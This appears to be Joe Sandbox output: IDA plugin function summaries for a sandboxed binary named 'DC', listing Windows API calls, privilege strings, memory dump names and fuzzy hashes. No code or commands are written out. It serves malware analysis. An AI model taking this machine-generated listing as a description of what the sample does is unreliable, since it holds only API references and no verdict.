Opcode Fuzzy Hash: abe1f1c34d9a9c0d3a88a095bc66c22de1975010582b9a0e1b3e2fdaaaecef10
Instruction Fuzzy Hash: F1917372248384BBD2219BA1CC89FFF7BECEB49704F044859F749D6181E775E6058B62

Function 00BD6FAA Relevance: 28.3, APIs: 12, Strings: 4, Instructions: 328fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00BD6FAA
_wcslen.LIBCMT ref: 00BD7013
_wcslen.LIBCMT ref: 00BD7084

Part of subcall function 00BD7A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00BD7AAB
Part of subcall function 00BD7A9C: GetLastError.KERNEL32 ref: 00BD7AF1
Part of subcall function 00BD7A9C: CloseHandle.KERNEL32(?), ref: 00BD7B00

Part of subcall function 00BDA1E0: DeleteFileW.KERNELBASE(000000FF,?,?,00BD977F,?,?,00BD95CF,?,?,?,?,?,00C02641,000000FF), ref: 00BDA1F1
Part of subcall function 00BDA1E0: DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,00BD977F,?,?,00BD95CF,?,?,?,?,?,00C02641), ref: 00BDA21F

CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,?,00000001,?), ref: 00BD7139
CloseHandle.KERNEL32(00000000), ref: 00BD7155
CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 00BD7298

Part of subcall function 00BD9DA2: FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00BD73BC,?,?,?,00000000), ref: 00BD9DBC
Part of subcall function 00BD9DA2: SetFileTime.KERNELBASE(?,?,?,?), ref: 00BD9E70

Part of subcall function 00BD9620: CloseHandle.KERNELBASE(000000FF,?,?,00BD95D6,?,?,?,?,?,00C02641,000000FF), ref: 00BD963B

Part of subcall function 00BDA4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00BDA325,?,?,?,00BDA175,?,00000001,00000000,?,?), ref: 00BDA501
Part of subcall function 00BDA4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00BDA325,?,?,?,00BDA175,?,00000001,00000000,?,?), ref: 00BDA532

Strings

SeCreateSymbolicLinkPrivilege, xrefs: 00BD6FCC
SeRestorePrivilege, xrefs: 00BD6FC2
UNC\, xrefs: 00BD7051
\??\, xrefs: 00BD702B

Memory Dump Source

Source File: 00000003.00000002.1421673153.0000000000BD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000003.00000002.1421648851.0000000000BD0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421715104.0000000000C03000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C0E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C15000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C32000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421795646.0000000000C33000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bd0000_DC.jbxd

Similarity

API ID: File$CloseHandle$AttributesCreateDelete_wcslen$BuffersCurrentErrorFlushH_prologLastProcessTime
String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
API String ID: 3983180755-3508440684
Opcode ID: 991afecd1de1a85c82db960b60f4ba0c9cfadc18491977fccef412c36ab1eeff
Instruction ID: 05b8f3a725995783123fd253346bb56f3bcb2da8d691de8020d5dd4567e3c787
Opcode Fuzzy Hash: 991afecd1de1a85c82db960b60f4ba0c9cfadc18491977fccef412c36ab1eeff
Instruction Fuzzy Hash: 77C1B371944644AADB25DB74CC81FEEF7E8EF04304F00459BFA56A7282FB34AA44CB61

Function 00BEF838 Relevance: 6.1, APIs: 4, Instructions: 73COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00BEF844
IsDebuggerPresent.KERNEL32 ref: 00BEF910
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00BEF930
UnhandledExceptionFilter.KERNEL32(?), ref: 00BEF93A

Memory Dump Source

Source File: 00000003.00000002.1421673153.0000000000BD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000003.00000002.1421648851.0000000000BD0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421715104.0000000000C03000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C0E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C15000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C32000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421795646.0000000000C33000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bd0000_DC.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: 3edb9019c029b35ece3265901d8fc77fa2ca635bde9a7984e09e578a355d2846
Instruction ID: 0fd50c22a908f57abbffbc5f64f116dd7826364a8b01eb7b851bc1d62e922df1
Opcode Fuzzy Hash: 3edb9019c029b35ece3265901d8fc77fa2ca635bde9a7984e09e578a355d2846
Instruction Fuzzy Hash: 0A311475D052599BDB20DFA5D989BCCBBF8AF08304F1040EAE40CAB250EB719B84CF44

Function 00BEE6A3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

VirtualQuery.KERNEL32(80000000,00BEE5E8,0000001C,00BEE7DD,00000000,?,?,?,?,?,?,?,00BEE5E8,00000004,00C31CEC,00BEE86D), ref: 00BEE6B4
GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,00BEE5E8,00000004,00C31CEC,00BEE86D), ref: 00BEE6CF

Strings

D, xrefs: 00BEE6C3

Memory Dump Source

Source File: 00000003.00000002.1421673153.0000000000BD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000003.00000002.1421648851.0000000000BD0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421715104.0000000000C03000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C0E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C15000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C32000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421795646.0000000000C33000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bd0000_DC.jbxd

Similarity

API ID: InfoQuerySystemVirtual
String ID: D
API String ID: 401686933-2746444292
Opcode ID: 3f71cc7cca01fa3b938047b4123d181e23987e61557db1ef82a312c03c54cb1a
Instruction ID: 1e30af5c95656ef0d20064a64f30628a9c87648b1ca84d37b1d95d26638cee9b
Opcode Fuzzy Hash: 3f71cc7cca01fa3b938047b4123d181e23987e61557db1ef82a312c03c54cb1a
Instruction Fuzzy Hash: 0801D4326001496BDB14DE29DC09BDE7BEAEFC4324F0CC160ED29D6154D738ED058680

Function 00BF8EBD Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 00BF8FB5
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 00BF8FBF
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 00BF8FCC

Memory Dump Source

Source File: 00000003.00000002.1421673153.0000000000BD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000003.00000002.1421648851.0000000000BD0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421715104.0000000000C03000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C0E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C15000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C32000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421795646.0000000000C33000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bd0000_DC.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: e2513fa42a9932769c19ba98684cab258c61bcac6e9ae94685b9d14b31edbdae
Instruction ID: 77119dc243f90aa117cb5002f2d0e96ca3f6198ed89a1d353eea15ef1f555a8e
Opcode Fuzzy Hash: e2513fa42a9932769c19ba98684cab258c61bcac6e9ae94685b9d14b31edbdae
Instruction Fuzzy Hash: AE31B27590122DABCB21DF69D889B9DBBF8EF48310F5045EAE41CA7250EB709F858F44

Function 00BFB348 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON

Download Yara Rule

Strings

., xrefs: 00BFB4DB

Memory Dump Source

Source File: 00000003.00000002.1421673153.0000000000BD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000003.00000002.1421648851.0000000000BD0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421715104.0000000000C03000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C0E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C15000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C32000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421795646.0000000000C33000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bd0000_DC.jbxd

Similarity

API ID:
String ID: .
API String ID: 0-248832578
Opcode ID: c3dace4512d61acf96ca6079df06773898fc41d3b44f6677a278f9aa2e06096d
Instruction ID: b464d417e516f639681277010309e94a42f76220d2100465e5711d17eb8ce4e1
Opcode Fuzzy Hash: c3dace4512d61acf96ca6079df06773898fc41d3b44f6677a278f9aa2e06096d
Instruction Fuzzy Hash: A631E27290024DAFCB289E78CC84EFA7BFDDB85314F1441E8EA1997252E7309E498B50

Function 00BEAF0F Relevance: 3.0, APIs: 2, Instructions: 45COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00BEAF35
GetNumberFormatW.KERNEL32(00000400,00000000,?,00C0E72C,?,?), ref: 00BEAF84

Memory Dump Source

Source File: 00000003.00000002.1421673153.0000000000BD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000003.00000002.1421648851.0000000000BD0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421715104.0000000000C03000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C0E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C15000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C32000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421795646.0000000000C33000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bd0000_DC.jbxd

Similarity

API ID: FormatInfoLocaleNumber
String ID:
API String ID: 2169056816-0
Opcode ID: e47d13541fea4c3575dbe6a632de963f0e98ffea9b7dcf06a4a4d867bc6a4f28
Instruction ID: c3e964849617d2881dfdaeec15bc81e41cacd90fd32b619bca9c809d3baceb9c
Opcode Fuzzy Hash: e47d13541fea4c3575dbe6a632de963f0e98ffea9b7dcf06a4a4d867bc6a4f28
Instruction Fuzzy Hash: 0A017C7A250348AAD7219F75EC45F9EB7BCEF08710F004426FA05E7190E370AA55CBA5

Function 00BD6C74 Relevance: 3.0, APIs: 2, Instructions: 16windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00BD6DDF,00000000,00000400), ref: 00BD6C74
FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 00BD6C95

Memory Dump Source

Source File: 00000003.00000002.1421673153.0000000000BD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000003.00000002.1421648851.0000000000BD0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421715104.0000000000C03000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C0E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C15000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C32000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421795646.0000000000C33000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bd0000_DC.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: 559ffb0775ce4ff25f5d8898716509be40b9b54a7f13f666c251a899f9e9dad3
Instruction ID: 53549e14a34b1672279672e63d7fc57a0e1b9bab8c23645a28b0901665de8913
Opcode Fuzzy Hash: 559ffb0775ce4ff25f5d8898716509be40b9b54a7f13f666c251a899f9e9dad3
Instruction Fuzzy Hash: A8D0C931385300BFFA110B618D46F2EBB9DFF45B55F19C445B795E80E0DA789424E629

Function 00BEF654 Relevance: 1.6, APIs: 1, Instructions: 147COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00BEF66A

Memory Dump Source

Source File: 00000003.00000002.1421673153.0000000000BD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000003.00000002.1421648851.0000000000BD0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421715104.0000000000C03000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C0E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C15000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C32000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421795646.0000000000C33000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bd0000_DC.jbxd

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: 7199902f159a2cc94d0a9f916b09383cb7621aa554b15ecee15e178d4bc44901
Instruction ID: 8c073703e88777c72e2f7fe19ac61a8969f546eb6b3577e79bf68aa3c99b1e0e
Opcode Fuzzy Hash: 7199902f159a2cc94d0a9f916b09383cb7621aa554b15ecee15e178d4bc44901
Instruction Fuzzy Hash: B65181B1A10656CFEB15CF59E8817AEBBF4FB88314F298979D801EB250D3749D01CB50

Function 00BDB146 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

GetVersionExW.KERNEL32(?), ref: 00BDB16B

Memory Dump Source

Source File: 00000003.00000002.1421673153.0000000000BD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000003.00000002.1421648851.0000000000BD0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421715104.0000000000C03000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C0E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C15000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C32000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421795646.0000000000C33000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bd0000_DC.jbxd

Similarity

API ID: Version
String ID:
API String ID: 1889659487-0
Opcode ID: 1b6f291a5ba9d612a7a3582495dcf8b0e9e04f65948e28f1511070395c258878
Instruction ID: 011d02e0bb6cf1d795f1977fb93dc5b1d9ee8039966d3799f9fed2f0d3b71414
Opcode Fuzzy Hash: 1b6f291a5ba9d612a7a3582495dcf8b0e9e04f65948e28f1511070395c258878
Instruction Fuzzy Hash: 8CF030B4D00208CFDB18CB18EC91BDD77F5FB49319F15469ADA1593390D374AA81CE60

Function 00BEF9D5 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_0001F9F0,00BEF3A5), ref: 00BEF9DA

Memory Dump Source

Source File: 00000003.00000002.1421673153.0000000000BD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000003.00000002.1421648851.0000000000BD0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421715104.0000000000C03000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C0E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C15000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C32000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421795646.0000000000C33000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bd0000_DC.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 4b30360f282df40fb2e75f4c3a732f226f6771709796b2c668f1ee446ddf6e10
Instruction ID: 8a9a3cce2907325ad2308ec950e695bd245de7d1594f173ccf9354078b439072
Opcode Fuzzy Hash: 4b30360f282df40fb2e75f4c3a732f226f6771709796b2c668f1ee446ddf6e10
Instruction Fuzzy Hash:

Function 00BFC030 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00BFC030

Memory Dump Source

Source File: 00000003.00000002.1421673153.0000000000BD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000003.00000002.1421648851.0000000000BD0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421715104.0000000000C03000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C0E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C15000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C32000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421795646.0000000000C33000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bd0000_DC.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: cacd782e735f307ca7e881de80563c451c85cd418a29fe2699451e17004be8ab
Instruction ID: dd98067d03e81c6fb8b5bb7717cabd24b3f4fb53ab24bfbc4fb6437bbf766b93
Opcode Fuzzy Hash: cacd782e735f307ca7e881de80563c451c85cd418a29fe2699451e17004be8ab
Instruction Fuzzy Hash: C3A001706122419BDB448F35AF4A74D3AA9AA5A69170A406AA509C5160EA2485A0AA01

Function 00BDE2E8 Relevance: 26.5, APIs: 12, Strings: 3, Instructions: 234COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 00BDE30E

Part of subcall function 00BD4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00BD40A5

Part of subcall function 00BE1DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00C11030,00000200,00BDD928,00000000,?,00000050,00C11030), ref: 00BE1DC4

_strlen.LIBCMT ref: 00BDE32F
SetDlgItemTextW.USER32(?,00C0E274,?), ref: 00BDE38F
GetWindowRect.USER32(?,?), ref: 00BDE3C9
GetClientRect.USER32(?,?), ref: 00BDE3D5
GetWindowLongW.USER32(?,000000F0), ref: 00BDE475
GetWindowRect.USER32(?,?), ref: 00BDE4A2
SetWindowTextW.USER32(?,?), ref: 00BDE4DB
GetSystemMetrics.USER32(00000008), ref: 00BDE4E3
GetWindow.USER32(?,00000005), ref: 00BDE4EE
GetWindowRect.USER32(00000000,?), ref: 00BDE51B
GetWindow.USER32(00000000,00000002), ref: 00BDE58D

Strings

d, xrefs: 00BDE3F5
$%s:, xrefs: 00BDE302
CAPTION, xrefs: 00BDE4BD

Memory Dump Source

Source File: 00000003.00000002.1421673153.0000000000BD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000003.00000002.1421648851.0000000000BD0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421715104.0000000000C03000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C0E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C15000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C32000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421795646.0000000000C33000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bd0000_DC.jbxd

Similarity

API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
String ID: $%s:$CAPTION$d
API String ID: 2407758923-2512411981
Opcode ID: dabb7cadd0b0f7b5889052a80e6d2b7768f378b8647341e31e624562007e2c9e
Instruction ID: 5beea1ae317a3e42e709774fd6c305f8ca821c00b1afa8d80d48408ebdb530ff
Opcode Fuzzy Hash: dabb7cadd0b0f7b5889052a80e6d2b7768f378b8647341e31e624562007e2c9e
Instruction Fuzzy Hash: AA81B071208341AFD710DFA8CD89B6FFBE9EB88714F04092EFA9597250E735E9058B52

Function 00BFCB22 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 00BFCB66

Part of subcall function 00BFC701: _free.LIBCMT ref: 00BFC71E
Part of subcall function 00BFC701: _free.LIBCMT ref: 00BFC730
Part of subcall function 00BFC701: _free.LIBCMT ref: 00BFC742
Part of subcall function 00BFC701: _free.LIBCMT ref: 00BFC754
Part of subcall function 00BFC701: _free.LIBCMT ref: 00BFC766
Part of subcall function 00BFC701: _free.LIBCMT ref: 00BFC778
Part of subcall function 00BFC701: _free.LIBCMT ref: 00BFC78A
Part of subcall function 00BFC701: _free.LIBCMT ref: 00BFC79C
Part of subcall function 00BFC701: _free.LIBCMT ref: 00BFC7AE
Part of subcall function 00BFC701: _free.LIBCMT ref: 00BFC7C0
Part of subcall function 00BFC701: _free.LIBCMT ref: 00BFC7D2
Part of subcall function 00BFC701: _free.LIBCMT ref: 00BFC7E4
Part of subcall function 00BFC701: _free.LIBCMT ref: 00BFC7F6

_free.LIBCMT ref: 00BFCB5B

Part of subcall function 00BF8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00BFC896,00C03A34,00000000,00C03A34,00000000,?,00BFC8BD,00C03A34,00000007,00C03A34,?,00BFCCBA,00C03A34), ref: 00BF8DE2
Part of subcall function 00BF8DCC: GetLastError.KERNEL32(00C03A34,?,00BFC896,00C03A34,00000000,00C03A34,00000000,?,00BFC8BD,00C03A34,00000007,00C03A34,?,00BFCCBA,00C03A34,00C03A34), ref: 00BF8DF4

_free.LIBCMT ref: 00BFCB7D
_free.LIBCMT ref: 00BFCB92
_free.LIBCMT ref: 00BFCB9D
_free.LIBCMT ref: 00BFCBBF
_free.LIBCMT ref: 00BFCBD2
_free.LIBCMT ref: 00BFCBE0
_free.LIBCMT ref: 00BFCBEB
_free.LIBCMT ref: 00BFCC23
_free.LIBCMT ref: 00BFCC2A
_free.LIBCMT ref: 00BFCC47
_free.LIBCMT ref: 00BFCC5F

Memory Dump Source

Source File: 00000003.00000002.1421673153.0000000000BD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000003.00000002.1421648851.0000000000BD0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421715104.0000000000C03000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C0E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C15000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C32000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421795646.0000000000C33000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bd0000_DC.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 63efad5d4bb9c2dae470d71057c1993ac791ae8330a09f506e2fdf7887c25980
Instruction ID: 5b418336b9b4a6d43527638313e70a1ae7ac25981e13e3694e18331836d6073b
Opcode Fuzzy Hash: 63efad5d4bb9c2dae470d71057c1993ac791ae8330a09f506e2fdf7887c25980
Instruction Fuzzy Hash: 33315E3560030D9FEB24AA38DA46B7ABBE9EF11350F1454ADE658D7192DF31EC88CB50

Function 00BE9711 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 126memoryCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00BE9736
_wcslen.LIBCMT ref: 00BE97D6
GlobalAlloc.KERNEL32(00000040,?), ref: 00BE97E5
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00BE9806
CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00BE982D

Strings

<head><meta http-equiv="content-type" content="text/html; charset=, xrefs: 00BE9760
utf-8"></head>, xrefs: 00BE976B
</html>, xrefs: 00BE97B7
<html>, xrefs: 00BE9755, 00BE978E

Memory Dump Source

Source File: 00000003.00000002.1421673153.0000000000BD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000003.00000002.1421648851.0000000000BD0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421715104.0000000000C03000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C0E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C15000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C32000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421795646.0000000000C33000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bd0000_DC.jbxd

Similarity

API ID: Global_wcslen$AllocByteCharCreateMultiStreamWide
String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
API String ID: 1777411235-4209811716
Opcode ID: 547b697c21818df1abbe1fed7a0446b88539adafc2cea6688bd4246746509b7f
Instruction ID: b1f9ddbff0e5a2d08847bde065ada8ee50cb3c4c04155eb3c75ace27fcdd2c43
Opcode Fuzzy Hash: 547b697c21818df1abbe1fed7a0446b88539adafc2cea6688bd4246746509b7f
Instruction Fuzzy Hash: DB3146321083957AE729AB369C46F6F77DCEF52710F10019EFA01971D2EB649A0CC3A6

Function 00BED69E Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 79windowCOMMON

Download Yara Rule

APIs

GetWindow.USER32(?,00000005), ref: 00BED6C1
GetClassNameW.USER32(00000000,?,00000800), ref: 00BED6ED

Part of subcall function 00BE1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00BDC116,00000000,.exe,?,?,00000800,?,?,?,00BE8E3C), ref: 00BE1FD1

GetWindowLongW.USER32(00000000,000000F0), ref: 00BED709
SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 00BED720
GetObjectW.GDI32(00000000,00000018,?), ref: 00BED734
SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 00BED75D
DeleteObject.GDI32(00000000), ref: 00BED764
GetWindow.USER32(00000000,00000002), ref: 00BED76D

Strings

STATIC, xrefs: 00BED6F3

Memory Dump Source

Source File: 00000003.00000002.1421673153.0000000000BD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000003.00000002.1421648851.0000000000BD0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421715104.0000000000C03000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C0E000.00000004.00000001.01000000.00000006.sdmpDownload File
